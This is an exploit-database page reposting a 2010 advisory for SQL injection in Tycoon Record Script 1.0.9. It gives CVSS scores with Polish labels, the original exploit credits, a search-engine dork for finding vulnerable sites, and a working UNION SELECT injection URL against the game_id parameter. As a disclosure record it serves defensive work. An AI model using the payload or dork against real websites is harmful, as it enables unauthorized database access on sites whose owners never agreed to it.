Tycoon Record Script 1.0.9 remote SQL injection vulnerability.

2010-08-09 / 2010-08-10
Credit: Silic0n
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

% Tycoon(CMS) Record Script Sql vulnerability ------------------------------------------------------------------------------- 0 | | | | | | TM 1 _______ _ __ ___ ______| |__ __ _ ___| | _____ _ __ _ __ ___| |_ 0 |_ / _ \| '_ \ / _ \______| '_ \ / _` |/ __| |/ / _ \ '__| '_ \ / _ \ __| 1 / / (_) | | | | __/ | | | | (_| | (__| < __/ | _| | | | __/ |_ 0 /___\___/|_| |_|\___| |_| |_|\__,_|\___|_|\_\___|_|(_)_| |_|\___|\__| 1 0xPrivate 0xSecurity 0xTeam 0 ++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 A Placec Of 0days ------------------------------------------------------------------------------ ^Exploit Title : Tycoon(CMS) Record Script Sql vulnerability ^Date : 7/8/2010 ^Vendor Site : http://www.tycoon.co.kr ^MOD Version : 1.0.9 ^Author : Silic0n (science_media017[At]yahoo.com) ^category: : webapps/0day ^Dork : inurl:index.php?mode=game_player ------------------------------------------------------------------------------ Special Thnanks To Jackh4x0r , Gaurav_raj420 , Mr 52 (7) , Dalsim , Zetra , haZl0oh , root4o , Dark , XG3N , Belma(sweety), messsy , Thor ,abronsius ,Nova , ConsoleFx , Exi , Beenu , R4cal , jaya ,entr0py,[]0iZy5 & All my friends . My Frnd Site : www.igniteds.net , www.anti-intruders.org (Will Be Up Very Soon) , www.root-market.com ,www.Darkode.com ,r00tDefaced.com ----------------------------------->Exploit<---------------------------------- 0x1: Goto http://{localhost}/record/index.php?mode=game_player&type=0&year=2010&game_id=-14 UNion Select 1,2,@@version Version : (4.0.22-log) ------------------------------------------------------------------------------

Referencje:

http://www.exploit-db.com/exploits/14572
http://secunia.com/advisories/40920
http://packetstormsecurity.org/1008-exploits/tycoonrecord-sql.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top